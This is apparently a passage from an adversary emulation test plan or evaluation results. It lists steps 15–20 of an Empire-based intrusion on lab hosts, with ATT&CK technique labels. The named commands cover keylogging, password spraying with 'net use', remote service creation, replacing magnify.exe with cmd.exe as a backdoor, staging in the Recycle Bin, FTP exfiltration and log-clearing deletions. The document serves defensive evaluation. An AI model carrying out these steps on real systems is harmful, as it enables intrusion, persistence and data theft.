Bypass User Account Control, Commonly Used Port, Remote File Copy, Standard Application Layer Protocol

i. Empire: UAC bypass module downloaded and executed a new Empire stager (wdbypass)

Step 15: Credential Access

15.A.1 Discovery

Application Window Discovery, Input Capture

i. Empire: Built-in keylogging module executed to capture keystrokes of user Bob

15.B.1 Credential Access

Credentials in Files

i. Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Step 16: Lateral Movement

16.A.1 Credential Access

Brute Force, Windows Admin Shares

i. Empire: 'net use' via PowerShell to brute force password spraying authentication attempts to Morris (10.0.1.4) and Nimda (10.0.1.6) targeting credentials of users Kmitnick, Bob, and Frieda

16.B.1 Lateral Movement

Windows Admin Shares, Valid Accounts, Brute Force

i. Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick

16.C.1 Defense Evasion

Network Share Connection Removal

i. Empire: 'net use /delete' via PowerShell

16.D.1 Lateral Movement

Windows Admin Shares, Valid Accounts

i. Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)

16.E.1 Command and Control, Lateral Movement

Remote File Copy

i. Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)

16.F.1 Execution

Command-Line Interface

i. Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick

16.G.1 Command and Control, Lateral Movement

Remote File Copy

i. Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)

16.H.1 Discovery

System Service Discovery

i. Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)

16.I.1 Persistence, Privilege Escalation

New Service, Masquerading

i. Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)

16.J.1 Discovery

System Service Discovery

i. Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)

16.K.1 Discovery

File and Directory Discovery

i. Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)

16.L.1 Execution

Service Execution

i. Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)

Step 17: Persistence

17.A.1 Discovery

System Service Discovery, Query Registry

i. Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services

17.B.1 Defense Evasion

File Permissions Modification

i. Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe

17.B.2 Defense Evasion

File Permissions Modification

i. Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe

17.C.1 Persistence, Privilege Escalation

Accessibility Features

i. Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe

Step 18: Collection

18.A.1 Discovery

File and Directory Discovery

i. Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)

18.B.1 Collection

Data Staged, Data from Network Shared Drive

i. Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)

Step 19: Exfiltration

19.A.1 Defense Evasion

Masquerading, Remote File Copy

i. Empire: File dropped to disk is a renamed copy of the WinRAR binary

19.B.1 Exfiltration

Data Compressed, Data Encrypted, Masquerading

i. Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file

19.C.1 Exfiltration

Exfiltration Over Alternative Protocol

i. Empire: Sequence of 'echo' commands via PowerShell to populate commands in text file (ftp.txt), which is then executed by FTP to exfil data through network connection separate of existing C2 channel

19.D.1 Defense Evasion

File Deletion

i. Empire: 'del C:\"$"Recycle.bin\old.rar'

19.D.2 Defense Evasion

File Deletion

i. Empire: 'del recycler.exe'

Step 20: Execution of Persistence

20.A.1 Persistence, Privilege Escalation

Accessibility Features, Remote Desktop Protocol

i. magnifer.exe previously overwritten by cmd.exe launched through RDP connection made to Creeper (10.0.0.4)

20.B.1 Discovery

System Owner / User Discovery

i. Executed 'whoami' via cmd persistence mechanism through RDP connection made to Creeper (10.0.0.4)